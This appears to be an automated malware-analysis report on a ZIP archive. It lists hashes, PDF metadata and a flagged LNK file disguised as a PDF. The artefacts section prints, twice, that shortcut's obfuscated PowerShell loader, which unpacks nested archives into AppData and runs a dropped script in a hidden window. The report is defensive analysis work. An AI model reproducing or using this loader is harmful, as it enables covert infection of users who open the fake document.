dea287ef5916eced7808ca3704ae67a6

ZIP Archive
|
MD5: dea287ef5916eced7808ca3704ae67a6
|
Size: 12.86 MB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	dea287ef5916eced7808ca3704ae67a6
Sha1	055e0229236497b91216b89395351ae8c9eed8f0
Sha256	d0b18d94c4abd7f0f3a3d07fd2172956f6ec9654b8cbf087954017dd92bd9e4f
Sha384	dab3d79bd8fd285ab120e7b08367abe72ab5e324f15b9dc27e5ca2fcbe81c3bfc5eefbe3a0ab8de7db6736249d2509fd
Sha512	ec88a9c73eacf14b478636b8ff4163103a8a407439aa44015d879fc0323c0201be545157e2130ff4b0c87360081d47d9f1cb37f6aab0a889adc148af288147df
SSDeep	393216:pEx9SPTatbIaGXKI3AD0VGdGlHtrpNqK9:Y9wkInwbOHZ9
TLSH	51D633AC7AF21C879EA4516F78441FF8737840743A5CC0217262C7D9F6A31AACB95CA7

File Structure

Informations

Name0	Value
6526_Predstavlenie_na_naznachenie.pdf	1.7
6526_Predstavlenie_na_naznachenie.pdf	D:20250901020936-07'00'
6526_Predstavlenie_na_naznachenie.pdf	Adobe Acrobat 22.1
6526_Predstavlenie_na_naznachenie.pdf	D:20250901021016-07'00'
6526_Predstavlenie_na_naznachenie.pdf	Adobe Acrobat 22.1 Image Conversion Plug-in
6526_Predstavlenie_na_naznachenie.pdf	D:20250901020936-07'00'
6526_Predstavlenie_na_naznachenie.pdf	Adobe Acrobat 22.1
6526_Predstavlenie_na_naznachenie.pdf	D:20250901021016-07'00'
6526_Predstavlenie_na_naznachenie.pdf	Adobe Acrobat 22.1 Image Conversion Plug-in

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe $project=([array](where.exe /r $env:USERPROFILE '6526_Predstavlenie_na_naznachenie.zip'))[0].Trim(); &(\"Exp\" + \"and\" + \"-A\" + \"rc\" + \"hive\") $project -D $env:APPDATA\maxPictureOutput; $project=$env:APPDATA+'\maxPictureOutput\FOUND.000\paymentAction'; $primaryCommentTag=$project+'.zip'; ren $project -N $primaryCommentTag; &(\"Exp\" + \"and\" + \"-A\" + \"rc\" + \"hive\") $primaryCommentTag -D $env:APPDATA\microsoftexcel; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\microsoftexcel\localRowSize)
Deobfuscated PowerShell	(Get-Content $env:APPDATA\microsoftexcel\localRowSize)

Name0

Value

LNK: Command Execution

Deobfuscated PowerShell

dea287ef5916eced7808ca3704ae67a6 (12.86 MB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe $project=([array](where.exe /r $env:USERPROFILE '6526_Predstavlenie_na_naznachenie.zip'))[0].Trim(); &(\"Exp\" + \"and\" + \"-A\" + \"rc\" + \"hive\") $project -D $env:APPDATA\maxPictureOutput; $project=$env:APPDATA+'\maxPictureOutput\FOUND.000\paymentAction'; $primaryCommentTag=$project+'.zip'; ren $project -N $primaryCommentTag; &(\"Exp\" + \"and\" + \"-A\" + \"rc\" + \"hive\") $primaryCommentTag -D $env:APPDATA\microsoftexcel; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\microsoftexcel\localRowSize) Malicious	dea287ef5916eced7808ca3704ae67a6 > 6526_Predstavlenie_na_naznachenie.‌‍pdf‌‍.lnk
Deobfuscated PowerShell	(Get-Content $env:APPDATA\microsoftexcel\localRowSize) Malicious	dea287ef5916eced7808ca3704ae67a6 > 6526_Predstavlenie_na_naznachenie.‌‍pdf‌‍.lnk > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.